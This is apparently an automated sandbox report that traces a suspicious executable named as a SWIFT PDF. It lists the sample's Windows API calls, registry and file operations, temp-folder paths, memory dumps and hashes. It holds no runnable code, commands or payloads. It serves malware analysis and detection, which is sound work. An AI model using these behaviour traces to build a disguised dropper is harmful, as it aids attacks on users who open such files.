                                                                                                                                • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(?), ref: 00401D59
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                • String ID: Calibri
                                                                                                                                • API String ID: 3808545654-1409258342
                                                                                                                                • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                                • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                                • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                                • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2471251623.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2471237821.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471265197.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471278641.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                                • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SWIFT091816-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00402894
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                  • Part of subcall function 00403258: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                                • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004028B0
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                  • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403091
                                                                                                                                  • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403138
                                                                                                                                  • Part of subcall function 00403027: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 00403161
                                                                                                                                  • Part of subcall function 00403027: wsprintfW.USER32 ref: 00403174
                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402928
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2082585436-0
                                                                                                                                • Opcode ID: a6b29bbfff6bedb85eff617e0f32f780eda951c653e88163e3cff6ef8cd4870b
                                                                                                                                • Instruction ID: f11faf613eabf70f6da5efab5544ef3b1f343b4f82166007b8c29dabf9a1b1c4
                                                                                                                                • Opcode Fuzzy Hash: a6b29bbfff6bedb85eff617e0f32f780eda951c653e88163e3cff6ef8cd4870b
                                                                                                                                • Instruction Fuzzy Hash: D0217C72800118BFCF116FA5CE4889E7EB9EF09324F24423AF554762E0C6795D81DB68
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsq69D9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsq69D9.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq69D9.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsq69D9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsq69D9.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsq69D9.tmp$C:\Users\user\AppData\Local\Temp\nsq69D9.tmp\System.dll
                                                                                                                                • API String ID: 3109718747-95932336
                                                                                                                                • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                                • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                                                • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                                • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2471251623.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2471237821.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471265197.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471278641.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeGlobal
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                                • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                                                • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                                • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2471251623.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2471237821.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471265197.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471278641.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                                • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                                • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                                • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                                • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                                • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                • String ID: !
                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                                • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                • String ID: Call
                                                                                                                                • API String ID: 3677997916-1824292864
                                                                                                                                • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                                                • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 2659869361-3081826266
                                                                                                                                • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                                                • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                  • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401EAA
                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
